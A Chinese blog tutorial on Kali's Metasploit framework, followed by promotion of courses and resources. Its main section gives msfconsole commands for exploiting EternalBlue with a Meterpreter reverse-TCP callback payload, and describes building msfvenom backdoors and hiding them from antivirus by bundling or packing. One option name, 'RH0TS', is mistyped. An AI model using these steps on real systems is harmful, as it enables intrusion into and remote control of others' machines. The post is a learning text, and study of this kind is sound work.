【网络安全】-kali基本工具

最新推荐文章于 2024-06-13 15:43:50 发布
最新推荐文章于 2024-06-13 15:43:50 发布
阅读量430 收藏 9
点赞数 5
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_79055586/article/details/138235685
版权
本文介绍了MetasploitFramework的使用方法,包括针对存在EternalBlue漏洞的目标主机进行渗透攻击的过程,以及如何在无漏洞主机上部署间谍软件。同时提供了网络安全学习资源和成长路线建议。
摘要由CSDN通过智能技术生成
secure
ps.本着兴趣爱好,加强电脑的安全防护能力,并严格遵守法律和道德规范。

一、msf渗透

msf(metasploit framework)是一个开源的渗透测试框架,用于开发、测试和执行各种网络安全攻击。metasploit framework提供了大量的渗透测试工具漏洞利用模块负载模块,可以用于发现系统中的漏洞、测试系统的安全性,并进行攻击和漏洞利用。它支持多种操作系统,包括Windows、Linux和Mac OS X。

msf使用法则:使用模块->配置模块必选项->运行模块

msfconsole		//进入msf控制台,以使用模块(推荐root权限)
>>>进入msf

//1、使用模块
search 关键词	//搜索模块
use 模块编号/绝对路径	//使用模块
>>>进入模块
//2、配置模块必选项
show options	//显示配置选项
set 选项名称 值
//3、运行模块
run

1、有此漏洞的目标主机

metasploit攻击永恒之蓝(后门)

//1、使用模块
use exploit/windows/smb/ms17_010_eternalblue
//2、设置必选项
//查看必选项[*required为yes的就是必选项]
show options
set RH0TS 192.168.1.128	//[RHOSTS:为target host(s)代表你要攻击谁]
set payload windows/x64/meterpreter/reverse_tcp	//[payload,是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter][meterpreter相当于内部策反的间谍,提供远程控制功能。]
set LHOST 192.168.1.136 //[LHOSTS为listen host代表你是谁,既Kali的IP地址]
set LPORT 12345	//[LPORT:为listen port,代表你要在kali上开启的端口,1-65535随便选,但不能被占用]
3、运行
run
4、进入目标主机
>>>meterpreter
help	//从帮助里看看能对目标主机干什么

2、无此漏洞的目标主机(常用)

没有漏洞就得拍个间谍过去,把后门打开。

2.1 目标主机的间谍软件:msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线,更容易策反meterpreter,图中是windows,此外,还能直接修改为linux、OSX的后门软件。[*msfvenom在shell里使用,不是msfconsoles终端]
在这里插入图片描述
避开杀毒软件
方法一:和正常软件捆绑
在这里插入图片描述
方法二:给辅助软件加壳
自行寻找

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

花开的季节293
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【2024版】最新kali linux入门及常用简单工具介绍(非常详细)从零基础入门到精通,看完这一篇就够了
Libra1313的博客
01-16 1万+
正如刚才所说,kali里集成了大量的黑客工具网络安全相关工具,可以说黑客需要做的所有事情在这个系统中都有工具可以实现。下面我推荐几个新手入门可以用到的小工具。本文简单介绍了kali系统,只是适合对没有了解过的新手小白的一个引导关于我笔者本人 17 年就读于一所普通的本科学校,20 年 6 月在三年经验的时候顺利通过校招实习面试进入大厂,现就职于某大厂安全联合实验室。网络安全产业就像一个江湖,各色人等聚集。
Kalikali主要工具使用说明(文末附超全思维导图)
热门推荐
PP_zi的博客
05-11 3万+
本文为《从实践中学习Kali Linux渗透测试》总结笔记,仅供学习使用,禁止用于非法用途,转载请附上原文链接! 1. 信息收集 1.1 发现主机 traceroute 获取目标主机的路由条目,确定网络拓扑。每一跳表示一个网关,星号可能为防火墙导致。 1.1.1 扫描主机 ① nmap nmap -sP ip/ip段 对目标主机实施ping扫描,探测主机是否在线 也可以通过其他语法,扫描主机开放端口、使用的操作系统等 ② Netdiscover ARP侦查工具,可以扫描IP地址,检查在线主机。 .
kali工具集合
yesdmmf的博客
06-13 1608
1、信息收集 存活主机识别 arping arping,用来向局域网内的其它主机发送ARP请求的指令,它可以用来测试局域网内的某个IP是否已被使用。 实例 1:查看某个IP的MAC地址 arping 192.168.2.1 2: 当有多网卡是指定网卡 arping -i eth1 -c 1 192.168.2.1 3: 查看某个IP是否被不同的MAC占用(可检测是否存在arp欺骗) arping -d 192.168.2.1 4: 查看某个MAC地址的IP,要在同一子网才查得到 arping -c 1 52
kali工具的使用
TGFXK的博客
02-28 5593
一、netcat简介与使用 nc的全称为NetCat,它能够建立并接受传输控制协议(TCP)和用户数据报协议(UDP)的连接,Netcat可在这些连接上读写数据,直到连接关闭为止。它可以通过手工或者脚本与应用层的网络应用程序或服务进行交互。从技术上来讲,NetCat并不能产生UDP连接,因为UDP是一种无连接的协议。NetCat没有图形界面,很粗糙,很原始。Nc主要功能,Nc可以在两台设备上面相互交互,即侦听模式/传 nc工具的下载及安装: 下载:地址The GNU netcat - Browse
全网最全的Kali工具大全
MachineGunJoe666
10-12 9294
对每个工具的具体用途做了大概的描述。利用msf的exp结合xss构造有攻击性的html页面,当浏览器访问即会受到攻击并获取shell。生成包含exp的windows/android等各平台的可执行文件,木马制作利器。修改本机上网时的mac地址,一用作身份隐藏,二可用来绕过wifi mac黑名单。可向AP发送大量连接、断开请求,可向周围设备告知存在根本不存在的大量AP。类似gcc的编译器,更轻量,可编译c、c++、Objective-C。基于已捕获握手包和密码字典的WPA-PSK加密的wifi密码的猜解。
网安入门必备的12个kali Linux工具
小王的储物间
06-08 3135
是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。是一个开源的渗透测试工具,可以用来进行自动化检测,能自动化利用 SQL 注入漏洞的过程,帮助你接管数据库服务器。它可以用于测试应用程序的会话令牌或其他重要的数据项,如反 CSRF。最为知名的子项目是开源的Metasploit框架,一套针对远程主机进行开发和执行“exploit代码”的工具。(扫描器)— 一个 Web 应用程序安全扫描器,用于执行 Web 应用程序的自动漏洞扫描。
用于黑客渗透测试的 21 个最佳 Kali Linux 工具
WANGJUNAIJIAO的博客
06-07 3034
实际上 Kali Linux 捆绑了很多工具。请参考 Kali Linux 的官方工具列表页面来查找所有内容。你会发现其中一些是完全自由开源的,而有些则是专有解决方案(但是免费)。但是,出于商业目的,你应该始终选择高级版本。
penetration-testing-with-kali.pdf
08-10
Kali Linux 提供了多种渗透测试工具,如 Nmap、 Nessus、Metasploit 等,帮助安全专业人员执行渗透测试。 Offensive SecurityPWK(Penetration Testing with Kali Linux)是 Offensive Security 公司提供的一门...
网络攻防安全kali Linux漏洞扫描
最新发布
06-18
### 知识点详解 #### 一、网络攻防安全中的Kali Linux漏洞扫描 **Kali Linux**是一款专门设计用于数字取证、...无论是对于希望从事网络安全工作的个人还是需要维护网络安全的企业来说,掌握这些工具都是非常重要的。
30分钟快速安装虚拟机系统 -kali/渗透测试/网络安全/信息安全
06-29
标题中的“30分钟快速安装虚拟机系统 - kali/渗透测试/网络安全/信息安全”表明了这个...教程内容可能包括但不限于虚拟机的设置、Kali Linux的安装流程、基本网络安全概念、以及如何使用内置的渗透测试工具进行测试。
kali入门--fping工具的使用
12-19
网络安全审计、网络故障排查和系统管理中,fping是一个强大的工具。它可以快速识别网络中的活跃设备,找出可能的故障点,或者在渗透测试中定位潜在的目标。通过结合不同的参数,用户可以根据具体需求定制扫描行为...
lxc-kali:LXC的模板Kali
05-09
2. **Kali Linux**:Kali Linux是一套专门用于网络安全和渗透测试的Linux发行版,内置了大量的安全工具。了解这些工具的用途和使用方法是必要的。 3. **网络配置**:在LXC容器中,需要正确配置网络接口以确保容器能...
kali linux入门及常用简单工具介绍
2301_77815877的博客
05-10 1万+
相信很多同学了解到和学习网络安全的时候都听过kali系统,大家都称之为黑客最喜爱的系统,那么什么是kali,初学者用kali能做些什么,我将在本文中做简单的介绍正如刚才所说,kali里集成了大量的黑客工具网络安全相关工具,可以说黑客需要做的所有事情在这个系统中都有工具可以实现。下面我推荐几个新手入门可以用到的小工具。提示:这里对文章进行总结:例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
黑客圈最受欢迎的21个Kali Linux 工具,你用过几个?
m0_71745484的博客
05-27 4030
21款Kali Linux 工具,用过的都爱不释手!
Kali Linux神秘工具教程(详细版)
简介
02-03 9738
Kali Linux是道德黑客最好的开源安全软件包之一,包含一组按类别划分的工具Kali Linux 可以作为操作系统安装在机器中,本教程对此进行了讨论。安装 Kali Linux 是一个实用的选择,因为它提供了更多选项来工作和组合工具。本教程全面了解了 Kali Linux,并解释了如何在实践中使用它。本文讲解了kali神秘工具,下期讲解社会工程和压力工具
kali总结——基本工具
haoaaao的博客
04-02 8333
一、netcat 1、 功能: 监听模式/传输模式、telnet/获取banner信息、传输文本信息、传输文件/目录、加密传输文件、传承控制/木马、加密所有流量、流媒体服务器、远程克隆硬盘 2、nc-telnet/banner 可作为客户端使用、也可作为服务器端使用 (1)nc -vn v显示详细连接信息,n后面跟一个ip。由于直接进行域名解析比较慢,所以通常先把域名对应的ip解析出来,然后用nc连ip,就可以查看到服务器的banner信息. ...
全网最全的Kali工具介绍大全
Python_0011的博客
06-07 679
如果你读过 Kali Linux 点评,你就知道为什么它被认为是最好的黑客渗透测试的 Linux 发行版之一,而且名副其实。它带有许多工具,使你可以更轻松地测试、破解以及进行与数字取证相关的任何其他工作。它是道德黑客ethical hacker最推荐的 Linux 发行版之一。即使你不是黑客而是网站管理员 —— 你仍然可以利用其中某些工具轻松地扫描你的网络服务器或网页。在任何一种情况下,无论你的目的是什么 —— 让我们来看看你应该使用的一些最好的 Kali Linux 工具
Kali Linux网络扫描实战指南
本书对Kali Linux这个专门用于渗透测试和安全审计的Linux发行版进行了详细的探讨,适合那些希望提升网络安全技能或者进行安全评估的专业人士。译者飞龙的翻译使得中文版读者也能无障碍地学习这些内容。书中的每个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值